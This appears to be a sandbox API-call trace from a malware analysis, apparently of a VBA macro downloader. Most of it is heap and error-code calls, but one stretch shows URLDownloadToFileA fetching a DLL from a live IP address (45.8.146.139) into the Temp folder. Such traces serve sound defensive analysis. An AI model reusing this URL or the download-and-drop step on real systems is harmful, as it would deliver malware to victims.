lpWideCharStr="=::=::\\", cchWideChar=1511, lpMultiByteStr=0xc867ae0, cbMultiByte=1511, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1511 [0117.413] FreeEnvironmentStringsW (penv=0xcac3ce8) returned 1 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xa0) returned 0xcb96f50 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x1f) returned 0xcadd238 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x2e) returned 0xcaed828 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x37) returned 0xcac0b50 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x3c) returned 0xc92f6c8 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x31) returned 0xcac0fd0 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x14) returned 0xc83efc0 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x24) returned 0xb3b4ec8 [0117.413] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x31) returned 0xcac10d0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x28) returned 0xb3b5048 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xd) returned 0xca980f8 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x1d) returned 0xcadd030 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x31) returned 0xcac1810 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x15) returned 0xc83f6c0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x17) returned 0xc83f940 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xe) returned 0xca981b8 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x69) returned 0xc966258 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x3e) returned 0xc92f440 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x1b) returned 0xcadcd88 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x1d) returned 0xcadcea0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x48) returned 0xcaf8110 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x12) returned 0xc840280 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x18) returned 0xc8403e0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x1b) returned 0xcadd008 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x24) returned 0xb3b4ef8 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x29) returned 0xcaed8d0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x1e) returned 0xcadcdd8 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x6b) returned 0xc966ff0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x17) returned 0xc840c00 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x14) returned 0xc840b60 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xf) returned 0xca981e8 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x16) returned 0xc840d40 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x2a) returned 0xcaed9b0 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x29) returned 0xcae6208 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x12) returned 0xc840c40 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x21) returned 0xb3b50d8 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x16) returned 0xc840c80 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x22) returned 0xb3b5228 [0117.414] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x12) returned 0xc840d80 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x65) returned 0xf3cfba0 [0117.415] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xc867ae0 | out: hHeap=0x930000) returned 1 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x80) returned 0xca5d010 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x8) returned 0xcaf72a0 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x20) returned 0xcadd0a8 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x2) returned 0xcaf7250 [0117.415] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7250 | out: hHeap=0x930000) returned 1 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x2) returned 0xcaf72d0 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x8) returned 0xcaf72e0 [0117.415] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x18) returned 0xc840d60 [0117.415] GetLastError () returned 0x0 [0117.416] SetLastError (dwErrCode=0x0) [0117.416] GetLastError () returned 0x0 [0117.416] SetLastError (dwErrCode=0x0) [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xb8) returned 0xb3e30d0 [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x6a6) returned 0xcb2adc0 [0117.416] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcb2adc0 | out: hHeap=0x930000) returned 1 [0117.416] GetLastError () returned 0x0 [0117.416] SetLastError (dwErrCode=0x0) [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x6) returned 0xcaf7300 [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x2) returned 0xcaf7310 [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x4) returned 0xcaf7200 [0117.416] GetLastError () returned 0x0 [0117.416] SetLastError (dwErrCode=0x0) [0117.416] GetLastError () returned 0x0 [0117.416] SetLastError (dwErrCode=0x0) [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xb8) returned 0xb3e3250 [0117.416] GetLastError () returned 0x0 [0117.416] SetLastError (dwErrCode=0x0) [0117.416] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x6a6) returned 0xcb2adc0 [0117.416] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcb2adc0 | out: hHeap=0x930000) returned 1 [0117.416] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7300 | out: hHeap=0x930000) returned 1 [0117.417] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xb3e30d0 | out: hHeap=0x930000) returned 1 [0117.417] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7200 | out: hHeap=0x930000) returned 1 [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x6) returned 0xcaf7360 [0117.417] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x2) returned 0xcaf7380 [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x200) returned 0xc89eaa8 [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x4) returned 0xcaf7300 [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0xb8) returned 0xb3e3550 [0117.417] GetLastError () returned 0x0 [0117.417] SetLastError (dwErrCode=0x0) [0117.417] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x6a6) returned 0xcb2adc0 [0117.417] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcb2adc0 | out: hHeap=0x930000) returned 1 [0117.417] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7360 | out: hHeap=0x930000) returned 1 [0117.417] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xb3e3250 | out: hHeap=0x930000) returned 1 [0117.418] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7300 | out: hHeap=0x930000) returned 1 [0117.418] GetLastError () returned 0x0 [0117.418] SetLastError (dwErrCode=0x0) [0117.418] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x6) returned 0xcaf7300 [0117.418] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7380 | out: hHeap=0x930000) returned 1 [0117.418] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcaf7310 | out: hHeap=0x930000) returned 1 [0117.418] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x8) returned 0xcaf7350 [0117.418] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x50) returned 0xca9cdc8 [0117.419] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x40) returned 0xc92f758 [0117.419] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x40) returned 0xc92f518 [0117.419] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x40) returned 0xc92f320 [0117.419] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x40) returned 0xc92f368 [0117.419] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xc92f368 | out: hHeap=0x930000) returned 1 [0117.419] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf590f88 [0117.419] GetLocalTime (in: lpSystemTime=0x197574 | out: lpSystemTime=0x197574*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x2b, wSecond=0x1, wMilliseconds=0x3a8)) [0117.419] wsprintfA (in: param_1=0xf590f88, param_2="%02u:%02u:%02u " | out: param_1="18:43:01 ") returned 9 [0117.419] wsprintfA (in: param_1=0xf590f91, param_2="Starting download\n" | out: param_1="Starting download\n") returned 18 [0117.419] OutputDebugStringA (lpOutputString="18:43:01 Starting download\n") [0117.420] LocalFree (hMem=0xf590f88) returned 0x0 [0117.420] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x1033) returned 0xcac3ce8 [0117.420] GetTempPathA (in: nBufferLength=0x1000, lpBuffer=0xcac3d00 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0117.421] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="y", uUnique=0x0, lpTempFileName=0xcac3d00 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yef3f.tmp")) returned 0xef3f [0117.424] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yef3f.tmp")) returned 1 [0117.425] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf58cf68 [0117.425] GetLocalTime (in: lpSystemTime=0x1975d8 | out: lpSystemTime=0x1975d8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x2b, wSecond=0x1, wMilliseconds=0x3a8)) [0117.425] wsprintfA (in: param_1=0xf58cf68, param_2="%02u:%02u:%02u " | out: param_1="18:43:01 ") returned 9 [0117.425] wsprintfA (in: param_1=0xf58cf71, param_2="Starting download from %s to %s\n" | out: param_1="Starting download from http://45.8.146.139/fhfty/NKE0PO4-_KF8A086N-KAQB-A__DNJ2XD/rm to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll\n") returned 139 [0117.425] OutputDebugStringA (lpOutputString="18:43:01 Starting download from http://45.8.146.139/fhfty/NKE0PO4-_KF8A086N-KAQB-A__DNJ2XD/rm to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll\n") [0117.425] LocalFree (hMem=0xf58cf68) returned 0x0 [0117.425] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x713f0000 [0117.459] URLDownloadToFileA (param_1=0x0, param_2="http://45.8.146.139/fhfty/NKE0PO4-_KF8A086N-KAQB-A__DNJ2XD/rm", param_3="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yef3f.tmp.dll"), param_4=0x0, param_5=0x0) returned 0x0 [0119.994] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf58df70 [0119.994] GetLocalTime (in: lpSystemTime=0x1975c8 | out: lpSystemTime=0x1975c8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x2b, wSecond=0x4, wMilliseconds=0x1f6)) [0119.994] wsprintfA (in: param_1=0xf58df70, param_2="%02u:%02u:%02u " | out: param_1="18:43:04 ") returned 9 [0119.994] GetLastError () returned 0x0 [0119.994] FormatMessageA (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x19700c, nSize=0x0, Arguments=0x0 | out: lpBuffer="ØS;\x0b") returned 0x27 [0119.995] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x30) returned 0xcae6358 [0119.995] LocalFree (hMem=0xb3b53d8) returned 0x0 [0119.995] GetLastError () returned 0x0 [0119.995] wsprintfA (in: param_1=0xf58df79, param_2="Finished download from %s to %s: %d %s\n" | out: param_1="Finished download from http://45.8.146.139/fhfty/NKE0PO4-_KF8A086N-KAQB-A__DNJ2XD/rm to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") returned 190 [0119.995] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xcae6358 | out: hHeap=0x930000) returned 1 [0119.995] OutputDebugStringA (lpOutputString="18:43:04 Finished download from http://45.8.146.139/fhfty/NKE0PO4-_KF8A086N-KAQB-A__DNJ2XD/rm to C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll: 0 Error#0:The operation completed successfully.\r\n\n") [0119.996] LocalFree (hMem=0xf58df70) returned 0x0 [0119.996] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x40) returned 0xf4d2510 [0119.996] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x8, Size=0x38) returned 0xc8d7940 [0119.996] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x76720000 [0119.997] GetProcAddress (hModule=0x76720000, lpProcName="AreFileApisANSI") returned 0x7673f300 [0119.997] AreFileApisANSI () returned 1 [0119.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf4d2510, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0119.997] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x66) returned 0xf3cf820 [0119.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf4d2510, cbMultiByte=-1, lpWideCharStr=0xf3cf820, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll") returned 51 [0119.997] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yef3f.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ea4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc8 [0119.998] GetFileType (hFile=0xcc8) returned 0x1 [0119.998] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xf3cf820 | out: hHeap=0x930000) returned 1 [0119.998] CloseHandle (hObject=0xcc8) returned 1 [0119.998] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xf4d2510 | out: hHeap=0x930000) returned 1 [0119.998] AreFileApisANSI () returned 1 [0119.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcac3d00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0119.998] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x66) returned 0xf3cf510 [0119.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcac3d00, cbMultiByte=-1, lpWideCharStr=0xf3cf510, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll") returned 51 [0119.998] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yEF3F.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\yef3f.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ecc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc8 [0119.998] GetFileType (hFile=0xcc8) returned 0x1 [0119.999] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xf3cf510 | out: hHeap=0x930000) returned 1 [0119.999] RtlAllocateHeap (HeapHandle=0x930000, Flags=0x0, Size=0x1000) returned 0xf58ef78 [0119.999] ReadFile (in: hFile=0xcc8, lpBuffer=0xf58ef78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xf58ef78*, lpNumberOfBytesRead=0x196efc*=0xc9, lpOverlapped=0x0) returned 1 [0119.999] ReadFile (in: hFile=0xcc8, lpBuffer=0xf58ef78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x196efc, lpOverlapped=0x0 | out: lpBuffer=0xf58ef78*, lpNumberOfBytesRead=0x196efc*=0x0, lpOverlapped=0x0) returned 1 [0119.999] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0xf58ef78 | out: hHeap=0x930000) returned 1 [0119.999] CloseHandle (hObject=0xcc8) returned 1 [0120.000] GetLastError () returned 0x0 [0120.001] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0120.001] SetLastError (dwErrCode=0x0) [0120.001] GetLastError () returned 0x0 [0120.001] SetLastError (dwErrCode=0x0) [0120.003] GetLastError () returned 0x0 [0120.003] SetLastError (dwErrCode=0x0) [0120.004] GetLastError () returned 0x0 [0120.004] SetLastError (dwErrCode=0x0) [0120.014] Sleep (dwMilliseconds=0x0) [0120.034] GetAsyncKeyState (vKey=3) returned 0 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.034] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.035] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0120.035] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x2b, wSecond=0x4, wMilliseconds=0x225)) [0120.035] Sleep (dwMilliseconds=0x0) [0120.045] SetErrorMode (uMode=0x8001) returned 0x8001 [0120.045] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0120.045] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0120.046] SetErrorMode (uMode=0x8001) returned 0x8001 [0120.046] GetProcAddress (hModule=0x743d0000, lpProcName="KillTimer") returned 0x74408aa0 [0120.046] KillTimer (hWnd=0x0, uIDEvent=0x7f75) returned 1 [0120.046] GetLastError () returned 0x0 [0120.049] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.049] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.049] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.049] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0120.050] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.050] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.050] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.050] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.051] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0120.051] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc8d7ac0) returned 0x0 [0120.051] MkParseDisplayName (in: pbc=0xc8d7ac0, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc8d7780) returned 0x0 [0120.053] IUnknown:Release (This=0xc8d7ac0) returned 0x0 [0120.053] BindMoniker (in: pmk=0xc8d7780, grfOpt=0x0, iidResult=0x68408088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cebacc) returned 0x0 [0120.054] IUnknown:Release (This=0xc8d7780) returned 0x0 [0120.056] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0120.056] SafeArrayAllocData (psa=0xb3b53e8) returned 0x0 [0120.063] SafeArrayDestroyData (psa=0xb3b53e8) returned 0x0 [0120.063] SafeArrayDestroyDescriptor (psa=0xb3b53e8) returned 0x0 [0120.068] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.068] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.068] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.068] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0120.069] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.069] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.069] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.069] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0120.069] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0120.069] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc8d7780) returned 0x0 [0120.070] MkParseDisplayName (in: pbc=0xc8d7780, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc8d7ac0) returned 0x0 [0120.071] IUnknown:Release (This=0xc8d7780) returned 0x0 [0120.071] BindMoniker (in: pmk=0xc8d7ac0, grfOpt=0x0, iidResult=0x68408088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8ceb88c) returned 0x0 [0120.071] IUnknown:Release (This=0xc8d7ac0) returned 0x0 [0120.074] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0120.074] SafeArrayAllocData (psa=0xb3b53e8) returned 0x0 [0120.077] SafeArrayDestroyData (psa=0xb3b53e8) returned 0x0 [0120.077] SafeArrayDestroyDescriptor (psa=0xb3b53e8) returned 0x0 [0120.086] GetAsyncKeyState (vKey=3) returned 0 [0120.090] SafeArrayDestroyData (psa=0xc8480c0) returned 0x0 [0120.100] SafeArrayAllocData (psa=0xc8480c0) returned 0x0 [0120.101] SafeArrayDestroyData (psa=0xc8480c0) returned 0x0 [0120.101] SafeArrayDestroyDescriptor (psa=0xc8480c0) returned 0x0 Thread: id = 16 os_tid = 0x1264 Thread: id = 17 os_tid = 0x1268 Thread: id = 18 os_tid = 0x128c Thread: id = 19 os_tid = 0x12a8 Thread: id = 20 os_tid = 0x12ac Thread: id = 21 os_tid = 0x12bc Thread: id = 22 os_tid = 0x12d0